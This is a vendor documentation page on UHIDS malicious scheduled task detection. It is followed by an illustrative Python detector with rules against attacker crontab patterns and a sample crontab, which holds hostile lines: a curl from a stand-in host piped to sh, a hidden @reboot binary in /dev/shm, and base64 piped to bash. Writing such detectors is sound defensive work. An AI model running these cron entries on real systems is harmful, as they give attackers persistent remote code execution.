Malicious Scheduled Task Detection
UHIDS' self-developed malicious scheduled task detection feature applies behavior analysis to scheduled tasks. By combining cloud-based big data analysis with static rules in the detection system, it detects common hacker behaviors in which scheduled tasks are used to hide and protect malicious processes and trojans.
Detection Principle
Once the Agent client plugin is installed, UHIDS automatically reads the contents of the common scheduled task directories and locations on the system. It analyzes what it reads, assesses each task's behavior for malicious activity, and triggers an alert notification.
Detection Cycle
- Once started, the plugin runs a check every 2 hours by default.
- After you clear a risk, the system rechecks the same risk within 2 hours. If the risk has been fixed, the alert is deleted automatically.
Detection Items
| Detection Item | Description |
|---|---|
| Crontab Scheduled Task Detection | Detection of scheduled tasks in Linux cron settings. |
| Startup Task Detection | Detection of startup tasks in Linux system startup settings. |
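The static-rule half of the detection principle, applied to the crontab item, can be sketched as follows. This is an added example, not UHIDS code: the three rules, the function names and the sample crontab are assumptions constructed for illustration, and the cloud-based analysis and startup task checks are not modeled.

```python
import re

# Assumed static rules for illustration; the page does not publish UHIDS' rule set.
RULES = [
    ("download-piped-to-shell", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z|da)?sh\b")),
    ("base64-decoded-to-shell", re.compile(r"base64\s+(-d|--decode)\b[^|;]*\|\s*(ba|z|da)?sh\b")),
    # Only the command position (line start or after ; & |), not arguments.
    ("runs-from-temp-dir", re.compile(r"(^|[;&|]\s*)(/tmp|/var/tmp|/dev/shm)/\S+")),
]
SCHEDULE = re.compile(r"^(@\w+|(\S+\s+){4}\S+)\s+(.*)$")  # @reboot or 5 time fields
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")     # e.g. SHELL=/bin/sh

def parse_entries(text, has_user_field):
    """Yield (line_no, command) for every job line in crontab-format text."""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        m = SCHEDULE.match(line)
        if not m:
            continue
        command = m.group(3)
        if has_user_field:  # /etc/crontab and /etc/cron.d/* carry a user column
            parts = command.split(None, 1)
            if len(parts) < 2:
                continue
            command = parts[1]
        yield no, command

def scan(text, has_user_field=False):
    """Return [(line_no, rule_name)] for every rule that matches a job's command."""
    return [(no, name)
            for no, cmd in parse_entries(text, has_user_field)
            for name, rx in RULES if rx.search(cmd)]

# Constructed sample in /etc/crontab format (not taken from a real host).
SAMPLE = """SHELL=/bin/sh
# m h dom mon dow user command
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/10 * * * * root curl -fsS http://example.invalid/u.sh | sh
@reboot root /dev/shm/.cache/upd >/dev/null 2>&1
30 4 * * * root find /tmp/sessions -mtime +7 -delete
*/5 * * * * www-data echo Y29uc3RydWN0ZWQ= | base64 -d | bash
"""

if __name__ == "__main__":
    for line_no, rule in scan(SAMPLE, has_user_field=True):
        print(f"line {line_no}: {rule}")
```

The `find /tmp/sessions` cleanup job is deliberately not flagged, because the temp-directory rule matches only a path in command position, not a path passed as an argument.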